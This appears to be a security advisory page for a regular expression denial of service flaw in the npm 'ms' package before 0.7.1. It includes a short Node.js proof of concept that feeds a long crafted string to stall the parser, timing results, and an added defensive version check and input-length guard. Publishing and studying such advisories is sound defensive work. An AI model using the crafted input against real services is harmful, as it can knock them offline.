Google OSV: GHSA-3FX5-FWVR-XRJG
History: Oct 24, 2017 - 6:33 p.m.

Regular Expression Denial of Service in ms

2017-10-24 18:33:36
Google
osv.dev
12

EPSS: 0.002
Percentile: 51.9%

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

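// Usage: node ms.js <length>
var ms = require('ms');

// Build a string of len + 1 copies of chr.
var genstr = function (len, chr) {
   var result = "";
   for (var i = 0; i <= len; i++) {
       result = result + chr;
   }

   return result;
};

// "minutea" is not a valid unit, so the match fails after the long digit run.
ms(genstr(parseInt(process.argv[2], 10), "5") + " minutea");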

Results

Execution time increases with the length of the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s
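
A defender-side check for this advisory, as an added example that is not from the advisory or the ms project: isAffectedMsVersion flags version strings older than 0.7.1, and guardDurationParser rejects over-long input before it reaches the parser. The function names, the 100-character cap and the stand-in parser are assumptions made for illustration.

```javascript
// Added example; not code from the ms project.
const FIXED = [0, 7, 1]; // first unaffected release, per the advisory text
const MAX_LEN = 100;     // assumed cap: legitimate duration strings are short

// True when an ms version string (e.g. from a lockfile) is older than 0.7.1.
// Pre-release suffixes are ignored, so "0.7.1-rc1" is treated as 0.7.1.
function isAffectedMsVersion(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version));
  if (!m) throw new TypeError('unparseable version: ' + version);
  const parts = m.slice(1).map(Number);
  for (let i = 0; i < 3; i++) {
    // Compare numerically so that 0.10.0 is not mistaken for 0.1.0.
    if (parts[i] !== FIXED[i]) return parts[i] < FIXED[i];
  }
  return false; // exactly 0.7.1
}

// Wrap a duration parser so that non-string or over-long input is rejected
// in constant time and never reaches the parser's regular expression.
function guardDurationParser(parse, maxLen = MAX_LEN) {
  return function guarded(input) {
    if (typeof input === 'number') return parse(input); // ms also accepts numbers
    if (typeof input !== 'string' || input.length > maxLen) return undefined;
    return parse(input);
  };
}

// Stand-in parser (constructed) so the example runs without installing ms.
// In an application, pass require('ms') to guardDurationParser instead.
const UNIT_MS = { ms: 1, s: 1000, m: 60000, h: 3600000, d: 86400000 };
function standInParse(input) {
  standInParse.calls = (standInParse.calls || 0) + 1;
  const m = /^(\d{1,15}) ?(ms|s|m|h|d)$/.exec(input);
  return m ? Number(m[1]) * UNIT_MS[m[2]] : undefined;
}

const guarded = guardDurationParser(standInParse);
console.log(isAffectedMsVersion('0.7.0'));           // affected release
console.log(guarded('5m'));                          // normal input is parsed
console.log(guarded('5'.repeat(80000) + ' minutea')); // rejected by the guard
```

The guard is a stopgap for call sites that cannot be upgraded immediately; moving to ms 0.7.1 or later is the fix the advisory points to.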
